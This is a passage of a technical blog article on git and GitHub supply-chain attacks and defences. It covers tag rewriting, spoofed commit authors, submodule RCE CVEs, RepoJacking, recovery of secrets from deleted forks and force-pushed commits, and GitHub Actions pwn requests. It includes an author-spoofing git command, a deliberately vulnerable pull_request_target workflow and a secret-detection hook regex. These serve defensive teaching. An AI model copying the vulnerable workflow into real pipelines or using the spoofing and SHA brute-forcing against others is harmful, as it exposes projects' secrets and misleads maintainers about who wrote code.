&lt;p&gt;Back to tj-actions and Trivy. The moment you write &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt;, every workflow run fetches "the commit that v44 currently points to". The commit a tag points to is not fixed in advance: &lt;strong&gt;it is whatever value is on the server at run time&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmldb8vzfydoho8tvmji.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmldb8vzfydoho8tvmji.png" alt="Git Tag" width="800" height="611"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Git does not forbid moving a tag. &lt;code&gt;git push --force --tags&lt;/code&gt; is enough. GitHub does not enable tag protection by default either.&lt;/p&gt;

&lt;p&gt;The fix is straightforward: &lt;strong&gt;pin to a commit SHA instead of a tag&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tj-actions/changed-files@a284dc1aef0bee70773b0f93ddaeb1e3ea9aa6ff&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A 40-char SHA is immutable as long as you can't collide SHA-1. But pinning alone is not enough: if the SHA you pinned was malicious from the start, you are still owned. So pinning needs to be combined with signature verification via &lt;strong&gt;Sigstore&lt;/strong&gt; or &lt;strong&gt;SLSA Provenance&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Sigstore is a signing infrastructure for OSS that issues short-lived certificates from an OIDC identity and writes the signature to a public log (Rekor) as one operation. SLSA Provenance attaches a signed JSON document to a build artifact recording "which source / builder / inputs produced it"; at level 3 and above it also requires tamper-resistant builders. Sigstore's git-signing CLI &lt;strong&gt;gitsign&lt;/strong&gt; lets you sign commits and tags with the same machinery.&lt;/p&gt;

&lt;p&gt;GitHub added a feature called &lt;strong&gt;Immutable Releases&lt;/strong&gt; in 2025 (Public Preview 2025-08-26, GA 2025-10-28). When enabled, the moment you cut a release the tag is locked to a specific commit, and you cannot move the tag, swap release assets, or delete the release. Each release also gets a signed &lt;strong&gt;release attestation&lt;/strong&gt; so consumers can verify authenticity. Incidents like tj-actions and Trivy cannot happen by design if the Action maintainer enables this. The catch: &lt;strong&gt;enablement is on the maintainer side&lt;/strong&gt;; consumers cannot force it.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.2 Commit author is self-declared
&lt;/h3&gt;

&lt;p&gt;Now consider the trust around commit author. Look at this sequence.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git &lt;span class="nt"&gt;-c&lt;/span&gt; user.name&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'Linus Torvalds'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-c&lt;/span&gt; user.email&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'torvalds@linux-foundation.org'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"fix: typo"&lt;/span&gt;
git push origin main
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is enough for the GitHub UI to show the commit &lt;strong&gt;with Linus Torvalds's avatar and a link to his profile&lt;/strong&gt;. GitHub just looks at the email field on the commit object and pulls the profile of "the account that has registered this email".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvbljoqbzehebr1oae7t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvbljoqbzehebr1oae7t.png" alt="Commit author is self-declared" width="800" height="411"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is not a GitHub bug; it is the spec. The git protocol itself does not verify authors.&lt;/p&gt;
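&lt;p&gt;You can see why from the object format itself. A commit is plain text hashed under a header of the word &lt;code&gt;commit&lt;/code&gt;, the body length, and a NUL byte; the author line is whatever bytes the pusher chose. A hedged Python sketch (the tree and timestamp are arbitrary; &lt;code&gt;\x3c&lt;/code&gt; / &lt;code&gt;\x3e&lt;/code&gt; are just the literal angle brackets around the email):&lt;/p&gt;

```python
import hashlib

def commit_sha(tree, author_name, author_email, message):
    # A commit object is plain text; the author line is whatever the
    # pusher wrote. \x3c and \x3e are the angle brackets around the email.
    body = (
        f"tree {tree}\n"
        f"author {author_name} \x3c{author_email}\x3e 1714500000 +0000\n"
        f"committer {author_name} \x3c{author_email}\x3e 1714500000 +0000\n"
        f"\n{message}\n"
    ).encode()
    obj = b"commit %d\x00" % len(body) + body  # git's "type size NUL" header
    return hashlib.sha1(obj).hexdigest()

tree = "4b825dc642cb6eb9a060e54bf8d69288fbee4904"  # git's well-known empty tree
spoofed = commit_sha(tree, "Linus Torvalds", "torvalds@linux-foundation.org", "fix: typo")
honest = commit_sha(tree, "mallory", "mallory@example.com", "fix: typo")
assert spoofed != honest   # the author line is hashed into the object ID...
assert len(spoofed) == 40  # ...but nothing ever checked who wrote it
```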

&lt;p&gt;The only real defense is &lt;strong&gt;commit signing + the Verified badge&lt;/strong&gt;. Sign with &lt;code&gt;git commit -S&lt;/code&gt; using GPG / SSH, register the key on your GitHub account, and the commit gets a "Verified" badge. Unsigned commits show nothing.&lt;/p&gt;

&lt;p&gt;The attacker's next move from here is to &lt;strong&gt;rely on readers ignoring the absence of a Verified badge&lt;/strong&gt;. Most developers do not check for the green check on every commit. Per a GitHub study (2025), repositories that adopt commit signing are still a minority, and a large fraction of commits land "unsigned = unverified".&lt;/p&gt;

&lt;p&gt;GitHub has a feature called &lt;strong&gt;vigilant mode&lt;/strong&gt; that forces an "Unverified" badge on unsigned commits. Even sneakier is the &lt;strong&gt;co-authored-by trailer&lt;/strong&gt;: write &lt;code&gt;Co-authored-by: Some Person &amp;lt;email&amp;gt;&lt;/code&gt; in the commit message and, if the main author is signed, GitHub shows "Partially Verified" while still attributing the co-author name to anyone you want.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.3 SHA-1 collision (SHAttered)
&lt;/h3&gt;

&lt;p&gt;Git's notion of object identity is SHA-1. SHA-1 was practically broken in 2017 by the SHAttered research from Google and CWI Amsterdam. Generating two different PDFs with the same SHA-1 cost about $110,000 of compute at the time.&lt;/p&gt;

&lt;p&gt;Can you collide a git commit with this? Not really, in practice. The reason: git prefixes a header like &lt;code&gt;blob &amp;lt;size&amp;gt;\0&lt;/code&gt; before hashing an object, so the header-prefixed blob and the raw PDF are different bytestreams. Running &lt;code&gt;git add&lt;/code&gt; on the SHAttered PDFs does not produce a collision. You would need to redo the same collision attack against git's object format, and that cost is still in the "computationally hard" zone.&lt;/p&gt;
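&lt;p&gt;A quick Python sketch of that header rule; this is the same computation &lt;code&gt;git hash-object&lt;/code&gt; performs for a blob:&lt;/p&gt;

```python
import hashlib

def git_blob_sha1(data):
    # git hashes "blob SIZE\0" + content, not the raw file bytes
    header = b"blob %d\x00" % len(data)
    return hashlib.sha1(header + data).hexdigest()

data = b"hello\n"
# the header-prefixed stream differs from the raw file, which is why a
# raw SHA-1 collision (like the SHAttered PDFs) does not survive `git add`
assert git_blob_sha1(data) == hashlib.sha1(b"blob 6\x00hello\n").hexdigest()
assert git_blob_sha1(data) != hashlib.sha1(data).hexdigest()
```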

&lt;p&gt;GitHub.com introduced &lt;strong&gt;SHA-1 collision detection&lt;/strong&gt; in 2017, and objects with the SHAttered attack signature are rejected at push time. Git itself adopted the same detection logic. Marc Stevens published a library called &lt;a href="https://github.com/cr-marcstevens/sha1collisiondetection" rel="noopener noreferrer"&gt;&lt;code&gt;sha1collisiondetection&lt;/code&gt;&lt;/a&gt; (commonly "sha1dc"), git imports it as a submodule, and replaces its built-in SHA-1 implementation with it. At nearly the cost of a normal SHA-1 computation, it returns a different hash or aborts when it detects collision-attack patterns.&lt;/p&gt;

&lt;p&gt;Separately, git is moving toward &lt;strong&gt;SHA-256&lt;/strong&gt;. You can create a SHA-256 repo with &lt;code&gt;git init --object-format=sha256&lt;/code&gt;. But most hosting providers, including GitHub.com, do not accept SHA-256 repos for push, so practical adoption is far off.&lt;/p&gt;

&lt;p&gt;The point worth taking away: &lt;strong&gt;a SHA-1 collision is not an immediate threat&lt;/strong&gt;, but unlike the other attacks above (tag rewrite, author spoofing) it is &lt;strong&gt;the mathematical foundation of "pin by commit SHA"&lt;/strong&gt; as a defense. If SHA-1 is fully broken, the SHA-pinning strategy below is also defeated. The SHA-256 migration is long-term insurance.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.4 RCE via submodule (CVE-2024-32002, CVE-2025-48384)
&lt;/h3&gt;

&lt;p&gt;In 2024 and 2025, two CVEs in a row let &lt;code&gt;git clone&lt;/code&gt; itself produce RCE. Both go through submodules.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2024-32002&lt;/strong&gt; abuses case-insensitive filesystems (macOS / Windows). The malicious repo contains both a submodule path and a symlink to that path. A case-insensitive filesystem cannot distinguish them, so during checkout, files that should be written into the worktree are written through the symlink into &lt;code&gt;.git/hooks/post-checkout&lt;/code&gt;. The next git command triggers the hook and runs arbitrary code. Setting &lt;code&gt;git config --global core.symlinks false&lt;/code&gt; avoids it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2025-48384&lt;/strong&gt; is more clever: it injects &lt;code&gt;\r&lt;/code&gt; (CR) into the path field in &lt;code&gt;.gitmodules&lt;/code&gt;. Git &lt;strong&gt;strips CRLF on read but does not quote on write&lt;/strong&gt;, so CR creates an asymmetry between read and write. Combined with a symlink, this turns into arbitrary file write and a hook is dropped. Reproducible on Linux / macOS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc60qeb4nzxqte1mdo34i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc60qeb4nzxqte1mdo34i.png" alt="RCE" width="800" height="520"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The mitigation is to use a &lt;strong&gt;patched git&lt;/strong&gt; (v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, v2.50.1 or later). Also avoid &lt;code&gt;--recursive&lt;/code&gt; clones of repos you don't trust. When CI builds external PRs, clone with &lt;code&gt;--no-recurse-submodules&lt;/code&gt; first and review the submodule contents manually.&lt;/p&gt;
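&lt;p&gt;For the CI case, the review flow might look like this sketch. The repo, the fake &lt;code&gt;.gitmodules&lt;/code&gt;, and the URL are stand-ins; the point is that &lt;code&gt;--no-recurse-submodules&lt;/code&gt; lets you list what submodules are declared before any of them are checked out:&lt;/p&gt;

```shell
# Build a repo that declares a submodule (stand-in for an untrusted clone source)
git init -q -b main suspect-repo
cat > suspect-repo/.gitmodules <<'EOF'
[submodule "lib"]
	path = lib
	url = https://example.com/evil/lib.git
EOF
git -C suspect-repo add .gitmodules
git -C suspect-repo -c user.name=demo -c user.email=demo@example.com \
    commit -q -m "add submodule"

# Review flow: clone WITHOUT recursing, then inspect the declared submodules
git clone -q --no-recurse-submodules suspect-repo review
git -C review config -f .gitmodules --list
```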




&lt;h2&gt;
  
  
  Layer 2: GitHub-platform persistence bugs
&lt;/h2&gt;

&lt;p&gt;From here we leave bare git and look at the convenience features GitHub the hosting service added on top, which backfire. Username / repo rename leads to &lt;strong&gt;RepoJacking&lt;/strong&gt;, fork object-store sharing leads to &lt;strong&gt;CFOR&lt;/strong&gt;, and force-push history overwrites lead to &lt;strong&gt;secret extraction from dangling commits&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 RepoJacking
&lt;/h3&gt;

&lt;p&gt;On GitHub you can rename or delete an org / user. But &lt;strong&gt;all the code that depended on that URL stays put&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;For example, suppose &lt;code&gt;myorg/foo&lt;/code&gt; has many &lt;code&gt;go get github.com/myorg/foo&lt;/code&gt; consumers, and &lt;code&gt;myorg&lt;/code&gt; is deleted. If an attacker registers &lt;code&gt;myorg&lt;/code&gt; and creates a &lt;code&gt;foo&lt;/code&gt; repo, &lt;strong&gt;fetches against the old URL now resolve to the attacker's repo&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42m49k4aztoetigy661x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42m49k4aztoetigy661x.png" alt="Repo Jacking" width="800" height="513"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GitHub protects the names of popular repos with &lt;strong&gt;namespace retirement&lt;/strong&gt;: once a repo passes a star threshold, its name cannot be re-registered after the owning account is deleted or renamed. But the &lt;strong&gt;race-condition bypass&lt;/strong&gt; Checkmarx published in 2024 used the timing gap between repo creation and username rename to skip retirement. That re-exposed over 4,000 packages.&lt;/p&gt;

&lt;p&gt;Defense is to &lt;strong&gt;pin dependencies to a commit SHA&lt;/strong&gt;, plus run a &lt;strong&gt;dependency proxy / vendor&lt;/strong&gt; so dependency code is mirrored in your own copy. Go modules' &lt;code&gt;GOPROXY=https://proxy.golang.org&lt;/code&gt; is close in spirit.&lt;/p&gt;
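&lt;p&gt;Resolving "what does this tag point at right now" is one &lt;code&gt;git ls-remote&lt;/code&gt; away, and the SHA it prints is what you pin. A minimal local sketch (repo name and tag are placeholders; against a real dependency you would pass its https URL):&lt;/p&gt;

```shell
# Local stand-in for a remote repo with a release tag
git init -q -b main pin-demo
git -C pin-demo -c user.name=demo -c user.email=demo@example.com \
    commit -q --allow-empty -m "release"
git -C pin-demo tag v1.0

# The printed SHA is what goes into your manifest or workflow, not the tag
git ls-remote ./pin-demo refs/tags/v1.0
```

For a GitHub Action this translates to `uses: owner/repo@<full-sha>` instead of `@v1`.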

&lt;h3&gt;
  
  
  2.2 Cross-Fork Object Reference (CFOR)
&lt;/h3&gt;

&lt;p&gt;This one surprises people who learn it for the first time. Consider this scenario.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;I own &lt;code&gt;myorg/private-repo&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Collaborator A forks it as &lt;code&gt;A/private-repo-fork&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;A accidentally pushes &lt;code&gt;~/.aws/credentials&lt;/code&gt; to the fork.&lt;/li&gt;
&lt;li&gt;A panics and deletes the fork.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The commit A pushed is still visible from my &lt;code&gt;myorg/private-repo&lt;/code&gt; URL&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fte4aeoy14ox916eafip4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fte4aeoy14ox916eafip4.png" alt="Cross Fork" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The reason is a GitHub optimization: forks share an object pool with their parent. When A deletes their fork, the commit object is still in the parent, so &lt;strong&gt;&lt;code&gt;github.com/myorg/private-repo/commit/&amp;lt;SHA&amp;gt;&lt;/code&gt; returns it&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The catch is "how do you learn the SHA?". Per Truffle Security, the git protocol allows references by &lt;strong&gt;short SHA (4 chars minimum)&lt;/strong&gt;. The GitHub UI also resolves commits via short-SHA URLs, so 4 chars = 16^4 = 65,536 attempts of brute force is enough to find a commit. Truffle reports finding &lt;strong&gt;40 valid API keys&lt;/strong&gt; in deleted forks of a major AI company.&lt;/p&gt;

&lt;p&gt;GitHub's response to the report was that this is an "intentional design decision". The behavior is staying.&lt;/p&gt;

&lt;p&gt;The defense is heavy.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Treat the deleted fork as a leak and rotate the secret&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;When experimenting on a private fork tied to a public repo, double-check what you &lt;code&gt;git push&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Enable secret scanning (push protection) at the org level.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2.3 Dangling commits / oops commits
&lt;/h3&gt;

&lt;p&gt;Force push only "removes a commit from history"; the object itself remains both locally and on the remote.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuilmtzotwgwo3c5hmbvx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuilmtzotwgwo3c5hmbvx.png" alt="Dangling commits" width="800" height="512"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;GitHub Archive&lt;/strong&gt; (gharchive.org) is a third-party archive that has been publishing GitHub's public events API as hourly time-ordered JSON dumps since 2011. It contains every public push / fork / PR event. &lt;code&gt;PushEvent&lt;/code&gt; carries &lt;code&gt;before&lt;/code&gt; and &lt;code&gt;after&lt;/code&gt; SHAs, so collecting the ones with &lt;code&gt;force=true&lt;/code&gt; gives you "the list of SHAs of dropped commits". Truffle Security's &lt;strong&gt;Force Push Scanner&lt;/strong&gt; pulls &lt;code&gt;before SHA&lt;/code&gt; from this archive and fetches each commit in turn to look for secrets.&lt;/p&gt;

&lt;p&gt;Scanning all dangling commits since 2020 with this technique, the report by Sharon Brizinov and Truffle Security found a &lt;strong&gt;GitHub PAT with admin permissions over the Istio repositories&lt;/strong&gt;, plus large quantities of valid AWS / MongoDB credentials and API tokens. They collected about 25,000 USD in bug bounties (tokens were revoked after responsible disclosure). &lt;strong&gt;Already-rotated secrets are obviously useless&lt;/strong&gt;, but the dominant pattern was secrets that nobody rotated after the original push.&lt;/p&gt;

&lt;p&gt;Defense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Rotate after pushing a secret&lt;/strong&gt; (deleting from history is not enough).&lt;/li&gt;
&lt;li&gt;Add a local &lt;code&gt;gitleaks&lt;/code&gt; / &lt;code&gt;trufflehog&lt;/code&gt; hook before push.&lt;/li&gt;
&lt;li&gt;Enable GitHub's &lt;strong&gt;secret scanning push protection&lt;/strong&gt; (org setting).&lt;/li&gt;
&lt;/ul&gt;
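&lt;p&gt;As a sketch of the hook idea: a deliberately naive &lt;code&gt;pre-push&lt;/code&gt; that greps the latest commit for an AWS-key pattern. A real setup should call &lt;code&gt;gitleaks&lt;/code&gt; or &lt;code&gt;trufflehog&lt;/code&gt; here instead of one hand-rolled regex:&lt;/p&gt;

```shell
# Repo with an "oops" commit containing a fake AWS key
git init -q -b main hook-demo
echo "AWS_KEY=AKIA1234567890ABCDEF" > hook-demo/.env
git -C hook-demo add .env
git -C hook-demo -c user.name=demo -c user.email=demo@example.com commit -q -m "oops"

# Naive pre-push gate (illustration only)
cat > hook-demo/.git/hooks/pre-push <<'EOF'
#!/bin/sh
# Abort the push when the latest commit matches an AWS-access-key pattern
if git log -p -1 | grep -qE 'AKIA[0-9A-Z]{16}'; then
  echo "possible AWS access key in HEAD; aborting push" >&2
  exit 1
fi
EOF
chmod +x hook-demo/.git/hooks/pre-push

(cd hook-demo && ./.git/hooks/pre-push) || echo "push blocked"   # prints "push blocked"
```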




&lt;h2&gt;
  
  
  Layer 3: GitHub Actions
&lt;/h2&gt;

&lt;p&gt;That covered "raw git and GitHub". GitHub Actions stacks &lt;strong&gt;a CI execution environment + secrets + tokens&lt;/strong&gt; on top of all of that. The trust gaps in Layers 1 and 2 get amplified into "automated privilege escalation" on Actions. Concretely, tag rewrite becomes mass distribution to every consumer, &lt;code&gt;pull_request_target&lt;/code&gt; becomes a hole that hands secrets to outside PRs, &lt;code&gt;${{ }}&lt;/code&gt; expansion turns a branch name into RCE, and the cache becomes an infection vector via main branch.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Tag rewrite, amplified by CI (tj-actions and Trivy)
&lt;/h3&gt;

&lt;p&gt;The tj-actions and Trivy incidents at the top of this article are Layer 1.1 (tags are labels) projected onto the trust model of Actions.&lt;/p&gt;

&lt;p&gt;Side by side:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;tj-actions/changed-files (2025-03)&lt;/th&gt;
&lt;th&gt;aquasecurity/trivy-action (2026-03)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CVE&lt;/td&gt;
&lt;td&gt;CVE-2025-30066&lt;/td&gt;
&lt;td&gt;GHSA-69fq-xp46-6x23&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Affected repos&lt;/td&gt;
&lt;td&gt;~23,000&lt;/td&gt;
&lt;td&gt;~10,000 (Trivy alone)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tags rewritten&lt;/td&gt;
&lt;td&gt;~45 (v1 through v45, all of them)&lt;/td&gt;
&lt;td&gt;75 of 76&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exposure window&lt;/td&gt;
&lt;td&gt;~15 hours&lt;/td&gt;
&lt;td&gt;~12 hours&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entry point&lt;/td&gt;
&lt;td&gt;leaked token from reviewdog/action-setup&lt;/td&gt;
&lt;td&gt;reused credentials from the first compromise&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Payload&lt;/td&gt;
&lt;td&gt;dump secrets from runner memory as base64 to stdout&lt;/td&gt;
&lt;td&gt;tampered entrypoint.sh that loads a credential stealer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detection&lt;/td&gt;
&lt;td&gt;StepSecurity flagged the anomaly&lt;/td&gt;
&lt;td&gt;Trivy maintainers disclosed the incident&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Some terminology from the table. &lt;strong&gt;reviewdog/action-setup&lt;/strong&gt; is a different Action that tj-actions depended on; the &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; leaked there gave the attacker write access to tj-actions's commits. &lt;strong&gt;StepSecurity&lt;/strong&gt; is a SaaS vendor that monitors GitHub Actions supply-chain behavior at runtime; in the tj-actions case they were the first to flag the anomaly of "this workflow is dumping base64 to a public log". For Trivy, the entry point is described as "reusing credentials leaked in the first compromise", i.e. the attacker carried stolen credentials from one Action breach into the next (per CrowdStrike's post-mortem, an automated bot called &lt;code&gt;hackerbot-claw&lt;/code&gt; was doing the reuse).&lt;/p&gt;

&lt;p&gt;What made Trivy worse is that this &lt;code&gt;hackerbot-claw&lt;/code&gt; was scanning many repos in parallel. It kept finding repos with broken &lt;code&gt;pull_request_target&lt;/code&gt; setups, stealing tokens, and rewriting tags on the next victim. &lt;strong&gt;It chains Layer 3.2 (pwn request) as the entry point with Layer 1.1 (tag rewrite) as the amplifier&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Pwn Request (the &lt;code&gt;pull_request_target&lt;/code&gt; trap)
&lt;/h3&gt;

&lt;p&gt;GitHub Actions has two PR triggers, &lt;code&gt;pull_request&lt;/code&gt; and &lt;code&gt;pull_request_target&lt;/code&gt;. The difference is critical.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;&lt;code&gt;pull_request&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;&lt;code&gt;pull_request_target&lt;/code&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Code that runs&lt;/td&gt;
&lt;td&gt;PR HEAD (= submitter's code)&lt;/td&gt;
&lt;td&gt;base branch (= existing code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token permissions&lt;/td&gt;
&lt;td&gt;read-only (&lt;code&gt;GITHUB_TOKEN&lt;/code&gt; restricted)&lt;/td&gt;
&lt;td&gt;base-side, with secrets access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use case&lt;/td&gt;
&lt;td&gt;tests / builds&lt;/td&gt;
&lt;td&gt;linter / labeler / auto-comments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Risk&lt;/td&gt;
&lt;td&gt;low&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;fatal if you check out the PR code&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Incidents typically come from a workflow shaped like this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/format.yml (vulnerable)&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pull_request_target&lt;/span&gt;
&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;format&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;ref&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.pull_request.head.ref }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;npm install &amp;amp;&amp;amp; npm run format&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;git push&lt;/span&gt;  &lt;span class="c1"&gt;# push the formatted result back to the PR&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It checks out PR code (= attacker code) and runs it directly, while still sitting in the &lt;code&gt;pull_request_target&lt;/code&gt; context that can read base-branch secrets. During &lt;code&gt;npm install&lt;/code&gt;, the &lt;code&gt;postinstall&lt;/code&gt; script in the attacker's &lt;code&gt;package.json&lt;/code&gt; runs and exfiltrates secrets.&lt;/p&gt;

&lt;p&gt;This is what hit &lt;strong&gt;Ultralytics YOLO&lt;/strong&gt; in December 2024. The branch name the attacker submitted as a PR was this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
